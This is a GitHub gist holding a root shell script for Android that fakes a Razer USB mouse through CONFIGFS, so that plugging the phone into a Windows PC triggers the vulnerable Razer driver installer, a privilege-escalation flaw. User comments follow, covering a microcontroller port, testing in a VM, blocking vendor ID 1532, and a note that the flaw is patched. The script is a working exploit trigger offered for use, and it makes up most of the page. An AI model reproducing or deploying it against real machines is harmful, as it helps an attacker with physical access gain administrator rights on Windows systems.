-
-
Save tothi/3cdec3aca80e08a406afe695d5448936 to your computer and use it in GitHub Desktop.
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID | |
# devices for triggering the vulnerable Windows Driver installer | |
# credits for the Windows Driver install vuln: @j0nh4t | |
# | |
# https://twitter.com/j0nh4t/status/1429049506021138437 | |
# https://twitter.com/an0n_r0/status/1429263450748895236 | |
# | |
# the script was developed & tested on Android LineageOS 18.1 | |
# work as root | |
su | |
# enable CONFIGFS | |
mount -t configfs none /sys/kernel/config | |
# create gadget | |
mkdir /sys/kernel/config/usb_gadget/pwn_razer | |
cd /sys/kernel/config/usb_gadget/pwn_razer | |
# set vendor (Razer) & product id | |
# for a list of suitable devices see the inf files in driver cab archive | |
# (feel free to change the product id) | |
echo 0x1532 > idVendor | |
echo 0x023e > idProduct | |
# set USB version 2 | |
echo 0x0200 > bcdUSB | |
# set device to class to Misc / Interface Association Descriptor. | |
echo 0xEF > bDeviceClass | |
echo 0x02 > bDeviceSubClass | |
echo 0x01 > bDeviceProtocol | |
# set some info strings | |
mkdir -p strings/0x409 | |
echo "deadbeefdeadbeef" > strings/0x409/serialnumber | |
echo "an0n" > strings/0x409/manufacturer | |
echo "fake Razer device" > strings/0x409/product | |
mkdir -p configs/c.1/strings/0x409 | |
echo "basic Multi-function device with single TLC (MI_02)" > configs/c.1/strings/0x409/configuration | |
# set some fake power config values | |
echo 250 > configs/c.1/MaxPower | |
echo 0x80 > configs/c.1/bmAttributes | |
# add 3 mouse HID devices (protocol 2) with a basic HID report descriptor | |
for i in g1 g2 g3 ; do | |
mkdir -p functions/hid.${i} | |
echo 2 > functions/hid.${i}/protocol | |
echo 6 > functions/hid.${i}/report_length | |
echo BQEJAqEBCQGhAIUBBQkZASkDFQAlAZUDdQGBApUBdQWBAwUBCTAJMRWBJX91CJUCgQaVAnUIgQHAwAUBCQKhAQkBoQCFAgUJGQEpAxUAJQGVA3UBgQKVAXUFgQEFAQkwCTEVACb/f5UCdRCBAsDA | base64 -d > functions/hid.${i}/report_desc | |
done | |
# activate the HID devices | |
for i in g1 g2 g3 ; do | |
ln -s functions/hid.${i} configs/c.1/ | |
done | |
# bind (for activating, disable default gadget and enable the new one) | |
# might need to be changed (if the active gadget is not in ../g1) | |
echo "" > ../g1/UDC ; getprop sys.usb.controller > UDC |
Got my microcontroller working to trigger + automate this
pwn.mp4
awesome! :)
Any way I can test this out on a vm without it auto executing on my pc?
Should be able to use a USB filter in the VMs usb settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices forUSB\VID_1532
Thank you!!
Got my microcontroller working to trigger + automate this
pwn.mp4
😮
Got my microcontroller working to trigger + automate this
pwn.mp4
Nice!!! Can you share the code?
Got my microcontroller working to trigger + automate this
pwn.mp4Nice!!! Can you share the code?
Sorry about the delay.
https://github.com/synap5e/razor-eop-XIAO
I know it's been a while, but is this still supposed to work? I know the vulnerability is patched by now, but I can't even make the co-installer run.
Should be able to use a USB filter in the VMs usb settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices for
USB\VID_1532